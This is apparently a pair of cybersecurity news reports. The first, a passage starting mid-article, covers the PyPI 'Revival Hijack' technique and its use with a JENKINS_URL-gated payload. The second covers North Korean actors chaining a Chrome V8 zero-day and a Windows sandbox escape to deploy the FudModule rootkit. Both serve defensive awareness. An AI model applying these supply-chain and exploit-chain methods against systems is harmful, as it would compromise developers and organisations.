JFrog said it took the step of creating a new PyPI user account called "security_holding" that it used to safely hijack the susceptible packages and replace them with empty placeholders so as to prevent malicious actors from capitalizing on the removed packages.
Additionally, each of these packages has been assigned the version number as 0.0.0.1 – the opposite of a dependency confusion attack scenario – to avoid getting pulled by developers when running a pip upgrade command.
What's more disturbing is that Revival Hijack has already been exploited in the wild, with an unknown threat actor called Jinnis introducing a benign version of a package named "pingdomv3" on March 30, 2024, the same day the original owner (cheneyyan) removed the package from PyPI.
On April 12, 2024, the new developer is said to have released an update containing a Base64-encoded payload that checks for the presence of the "JENKINS_URL" environment variable, and if present, executes an unknown next-stage module retrieved from a remote server.
"This suggests that the attackers either delayed the delivery of the attack or designed it to be more targeted, possibly limiting it to a specific IP range," JFrog said.
The new attack is a sign that threat actors are eyeing supply chain attacks on a broader scale by targeting deleted PyPI packages in order to expand the reach of the campaigns. Organizations and developers are recommended to inspect their DevOps pipelines to ensure that they are not installing packages that have been already removed from the repository.
"Using a vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install it to the target systems without any changes to the user's workflow," said Moussalli, JFrog Security Research Team Lead.
"The PyPI package attack surface is continually growing. Despite proactive intervention here, users should always stay vigilant and take the necessary precautions to protect themselves and the PyPI community from this hijack technique."
North Korean Hackers Deploy FudModule Rootkit via Chrome Zero-Day Exploit
1.9.24 Exploit The Hacker News
A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.
The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.
Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736. It's assessed to be a sub-cluster within the Lazarus Group (aka Diamond Sleet and Hidden Cobra).
It's worth mentioning that the use of the AppleJeus malware has been previously also attributed by Kaspersky to another Lazarus subgroup called BlueNoroff (aka APT38, Nickel Gladstone, and Stardust Chollima), indicative of the infrastructure and toolset sharing between these threat actors.
"Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain," the Microsoft Threat Intelligence team said.
"As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it."
The attack chains typically involve setting up fake websites masquerading as legitimate cryptocurrency trading platforms that seek to trick users into installing weaponized cryptocurrency wallets or trading applications that facilitate the theft of digital assets.
The observed zero-day exploit attack by Citrine Sleet involved the exploitation of CVE-2024-7971, a high-severity type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow threat actors to gain remote code execution (RCE) in the sandboxed Chromium renderer process. It was patched by Google as part of updates released last week.
As previously stated by The Hacker News, CVE-2024-7971 is the third actively exploited type confusion bug in V8 that Google resolved this year after CVE-2024-4947 and CVE-2024-5274.
It's currently not clear how widespread these attacks were or who was targeted, but the victims are said to have been directed to a malicious website named voyagorclub[.]space likely through social engineering techniques, thereby triggering an exploit for CVE-2024-7971.
The RCE exploit, for its part, paves the way for the retrieval of shellcode containing a Windows sandbox escape exploit (CVE-2024-38106) and the FudModule rootkit, which is used to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform [direct kernel object manipulation]."
CVE-2024-38106, a Windows kernel privilege escalation bug, is one of the six actively exploited security flaws that Microsoft remediated as part of its August 2024 Patch Tuesday update. That said, the Citrine Sleet-linked exploitation of the flaw has been found to have occurred after the fix was released.
"This may suggest a 'bug collision,' where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors," Microsoft said.
CVE-2024-7971 is also the third vulnerability that North Korean threat actors have leveraged this year to drop the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193, both of which are privilege escalation flaws in the built-in Windows drivers and were fixed by Microsoft in February and August.
"The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106," the company said.
"Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation."